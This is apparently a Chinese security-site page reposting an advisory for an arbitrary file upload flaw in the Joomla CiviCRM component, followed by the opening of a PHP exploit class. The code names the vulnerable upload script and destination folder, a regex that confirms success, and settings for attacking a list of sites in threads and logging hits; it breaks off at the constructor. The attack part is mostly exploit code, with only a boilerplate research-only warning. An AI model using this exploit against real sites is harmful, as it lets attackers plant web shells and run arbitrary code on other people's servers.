Joomla Civicrm组件任意Shell上传漏洞下载

来源:黑吧安全网 浏览:1729次 时间:2014-04-30
做网站找雨过天晴工作室

 受影响系统:

Joomla! Civicrm

描述:


BUGTRAQ  ID: 59372

Joomla Civicrm是组织成员关系管理系统。

Joomla Civicrm组件存在任意文件上传漏洞,攻击者可利用此漏洞上传任意文件到受影响系统,导致任意代码执行。

<*来源:miyachung
  *>

测试方法:


警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php

set_time_limit(0);
ob_start();
class exploit
{
  private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
  private $post_url_path    = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
  private $filename;
  private $url;
  private $file_to_upload;
  private $if_is_uploaded    = "/Undefined variable: HTTP_RAW_POST_DATA/si";
  private $thread_maxsize;
  private $site_list;
  private $file_regex;
  private $save_file      = "uploaded.txt";
  private $user_agent      = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
  private $timeout_sec    = 20;
  private $token        = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
  private $idnum        = 31;
  
  public function __construct($site_list,$filename,$thread,$regex)

[1] [2] [3] [4] [5]  下一页